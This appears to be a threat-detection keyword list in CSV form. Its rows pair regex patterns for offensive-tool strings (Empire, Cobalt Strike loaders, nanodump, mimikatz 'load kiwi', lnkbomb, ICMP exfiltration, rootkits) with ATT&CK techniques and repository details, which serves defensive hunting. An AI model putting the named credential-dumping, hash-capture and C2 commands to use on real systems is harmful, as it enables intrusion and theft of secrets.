"*ListAllUsers.ps1*",".{0,1000}ListAllUsers\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*ListDescriptionContainsPass*",".{0,1000}ListDescriptionContainsPass.{0,1000}","offensive_tool_keyword","SlinkyCat","This script 
performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*listdlls64.exe*",".{0,1000}listdlls64\.exe.{0,1000}","offensive_tool_keyword","UnlinkDLL","DLL Unlinking from InLoadOrderModuleList - InMemoryOrderModuleList - InInitializationOrderModuleList and LdrpHashTable","T1055 - T1027 - T1070","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/UnlinkDLL","1","1","N/A","7","1","54","11","2023-12-15T12:04:00Z","2023-12-13T14:37:33Z" "*ListDomainAdmins*",".{0,1000}ListDomainAdmins.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListDomainGroupsLocalAdmin*",".{0,1000}ListDomainGroupsLocalAdmin.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*listen(58082* '0.0.0.0'*",".{0,1000}listen\(58082.{0,1000}\s\'0\.0\.0\.0\'.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*listen_http 0.0.0.0 8080 *.php operation1*",".{0,1000}listen_http\s0\.0\.0\.0\s8080\s.{0,1000}\.php\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","713","153","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*Listening for incoming ICMP packets...*",".{0,1000}Listening\sfor\sincoming\sICMP\spackets\.\.\..{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*Listening for incoming requests on http://localhost:$port/*",".{0,1000}Listening\sfor\sincoming\srequests\son\shttp\:\/\/localhost\:\$port\/.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*List-GraphRunnerModules*",".{0,1000}List\-GraphRunnerModules.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*ListMetasploitPayloads*",".{0,1000}ListMetasploitPayloads.{0,1000}","offensive_tool_keyword","empire","Empire scripts argument. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*ListNeverLoggedInAccounts*",".{0,1000}ListNeverLoggedInAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListPasswordNeverExpire*",".{0,1000}ListPasswordNeverExpire.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*lists.tor2web.org*",".{0,1000}lists\.tor2web\.org.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*ListUsersLastPasswordChange*",".{0,1000}ListUsersLastPasswordChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersNoPasswordRequired*",".{0,1000}ListUsersNoPasswordRequired.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersPasswordMustChange*",".{0,1000}ListUsersPasswordMustChange.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*ListUsersPasswordNotChanged*",".{0,1000}ListUsersPasswordNotChanged.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD 
Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*litefuzz -lk -c*",".{0,1000}litefuzz\s\-lk\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz -s -a *",".{0,1000}litefuzz\s\-s\s\-a\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz* -l -c*",".{0,1000}litefuzz.{0,1000}\s\-l\s\-c.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz.py *",".{0,1000}litefuzz\.py\s.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*litefuzz\fuzz.py*",".{0,1000}litefuzz\\fuzz\.py.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*lkarlslund/Adalanche*",".{0,1000}lkarlslund\/Adalanche.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*LKM_HACKING.html*",".{0,1000}LKM_HACKING\.html.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "*lkmRootkitmodified*",".{0,1000}lkmRootkitmodified.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","N/A","10","3","258","32","2024-03-01T14:29:25Z","2023-05-30T02:30:47Z" "*llehsrewop*",".{0,1000}llehsrewop.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed powershell","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*llkat/rsockstun*",".{0,1000}llkat\/rsockstun.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*-llmnr -spn '*cifs* -secrets*",".{0,1000}\-llmnr\s\-spn\s\'.{0,1000}cifs.{0,1000}\s\-secrets.{0,1000}","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. 
More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","0","N/A","N/A","9","806","113","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" "*LLMNR.py*",".{0,1000}LLMNR\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*llmnr_sniffer.py*",".{0,1000}llmnr_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "*LLMNRSpoofer*",".{0,1000}LLMNRSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*llsrpc_##*",".{0,1000}llsrpc_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*lmhash*aad3b435b51404eeaad3b435b51404ee*",".{0,1000}lmhash.{0,1000}aad3b435b51404eeaad3b435b51404ee.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*L'n', L't', L'd', L'l', L'l', L'.', L'd', L'l', L'l', L'\0'*",".{0,1000}L\'n\',\sL\'t\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\.\',\sL\'d\',\sL\'l\',\sL\'l\',\sL\'\\0\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*lnkbomb.py *",".{0,1000}lnkbomb\.py\s.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","0","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*lnkbomb-1.0.zip*",".{0,1000}lnkbomb\-1\.0\.zip.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for 
collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","10","3","282","55","2022-12-25T19:33:18Z","2022-01-03T04:17:11Z" "*lnk-generate.py --host * --type ntlm --output *.lnk*",".{0,1000}lnk\-generate\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*lnkup.py --*",".{0,1000}lnkup\.py\s\-\-.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","10","4","311","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z" "*lnx_keylogger.py*",".{0,1000}lnx_keylogger\.py.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*load aggressor script*",".{0,1000}load\saggressor\sscript.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*load incognito*",".{0,1000}load\sincognito.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Incognito","10","10","N/A","N/A","N/A","N/A" "*load kiwi*",".{0,1000}load\skiwi.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002 - T1021","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation Tools","N/A","1","0","Mimikatz","10","10","N/A","N/A","N/A","N/A" "*load mimikatz windbg extension, extracts credential from crash dump*",".{0,1000}load\smimikatz\swindbg\sextension,\sextracts\scredential\sfrom\scrash\sdump.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","0","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*load_credentials(""credentials.txt"")*",".{0,1000}load_credentials\(\""credentials\.txt\""\).{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver 
with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*load_sc.exe *.bin*",".{0,1000}load_sc\.exe\s.{0,1000}\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","POC tool to convert CobaltStrike BOF files to raw shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FalconForceTeam/BOF2shellcode","1","0","N/A","10","10","161","27","2021-11-05T18:37:53Z","2021-11-05T14:29:57Z" "*load_ssp *.dll*",".{0,1000}load_ssp\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*Load-BeaconParameters*",".{0,1000}Load\-BeaconParameters.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Load-BetterXencrypt* ",".{0,1000}Load\-BetterXencrypt.{0,1000}\s","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*Load-Bof(*",".{0,1000}Load\-Bof\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 
- T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*loaddll64.exe*",".{0,1000}loaddll64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*loader.x64.exe.exe*",".{0,1000}loader\.x64\.exe\.exe.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","1","N/A","10","10","943","148","2024-01-30T23:37:09Z","2022-02-20T01:23:35Z" 
